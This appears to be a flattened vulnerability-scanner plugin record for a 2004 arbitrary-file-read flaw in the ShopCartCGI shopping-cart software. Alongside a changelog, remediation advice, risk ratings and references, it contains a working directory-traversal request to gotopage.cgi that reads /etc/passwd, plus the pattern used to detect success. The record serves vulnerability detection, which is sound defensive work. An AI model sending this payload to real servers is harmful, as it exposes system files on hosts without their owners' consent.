68 ShopCartCGI arbitrary file reading HTTP 2004/02/21 Marc Ruef marc dot ruef at computec dot ch http://www.computec.ch computec.ch Marc Ruef marc dot ruef at computec dot ch http://www.computec.ch computec.ch 2004/11/14 2.0 Added the needed pattern_exists command to let it work properly. Corrected the plugin structure and added the accuracy values in 1.4. Improved the pattern matching and introduced the plugin changelog in 2.0 tcp 80 open|send /gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd\n\n|sleep|close|pattern_exists HTTP/#.# ### *root:* 99 The HTTP request is copied from the Nessus plugin. ShopCartCGI The latest version of ShopCartCGI Configuration The remote host is running ShopCartCGI - a set of CGIs designed to set up an on-line shopping cart.There is a bug in this software which may allow an attacker to read arbitary files on the remote web server with the privileges of the web user. The web server should be deactivated or de-installed if not necessary. If this is not possible, upgrade to the latest version of this set of CGI or disable this software. 15 minutes Yes http://www.securityfocus.com/bid/9670/exploit/ Yes Yes High 4 9 7 7 Serious Nessus is able to check this vulnerability. 9670 12064 Hacking Exposed: Network Security Secrets & Solutions, Stuart McClure, Joel Scambray and George Kurtz, February 25, 2003, 4th Edition, McGraw-Hill Osborne Media, ISBN 0072227427 http://www.computec.ch